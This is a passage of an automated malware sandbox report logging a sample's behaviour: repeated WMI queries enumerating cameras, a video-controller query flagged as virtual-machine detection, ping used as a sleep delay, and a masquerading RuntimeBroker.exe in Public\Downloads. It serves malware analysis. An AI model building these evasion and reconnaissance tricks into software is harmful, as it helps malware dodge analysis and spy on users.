                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Uses ping.exe to sleep
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeMemory allocated: 1AF90000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1B030000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: BB0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1A810000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 15E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 1B4A0000 memory reserve | memory write watchJump to behavior
